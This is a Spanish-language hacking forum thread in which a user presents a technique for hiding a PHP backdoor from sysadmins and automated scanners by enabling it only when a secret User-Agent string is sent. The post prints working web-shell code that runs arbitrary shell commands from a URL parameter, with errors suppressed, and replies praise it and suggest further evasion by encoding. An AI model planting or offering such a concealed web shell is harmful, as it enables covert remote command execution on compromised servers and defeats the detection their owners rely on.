Ocultando Backdoor a través del User-Agent

Iniciado por blackdrake, Julio 08, 2015, 10:50:09 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Como todos sabemos, esconder un backdoor a veces no es un trabajo sencillo, ya que, sin contar de que el sysadmin sea inteligente, hay scripts automatizados que se encargan de buscar este tipo de backdoors.

Así que, un método para evitar esto, es jugar con el User-Agent de nuestro navegador.

Con un código bastante simple, podemos proteger nuestro backdoor de visitas indeseadas:

Código: php
<?php
if ($_SERVER['HTTP_USER_AGENT'] == "blackdrake")
{
@system($_GET['cmd']);
}
?>


De este modo, con una visita normal, no podremos ejecutar los comandos:


En cambio, modificando el User-Agent por blackdrake, si que podremos:



Algo muy sencillo pero que a algunos le vendrá bastante bien.

Un saludo.



Muy bueno mi joven amigo sencillo y funcional ...!!
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Muy bueno @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ! Un script sencillo, pero la idea le va a servir a más de uno. Gracias!

Saludos!

Y pasar el mismísimo comando en el User-Agent? :P
Visita mi blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Y pasar el mismísimo comando en el User-Agent? :P

Para eso habría que modificar constantemente el UA. Lo más cómodo es hacerlo de esta forma, supongo.

No había visto este aporte. Gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta!

Saludos!
WhiZ


buena, hace rato que queria probar si se puede encodear el contenido para variar  ;D , buen aporte!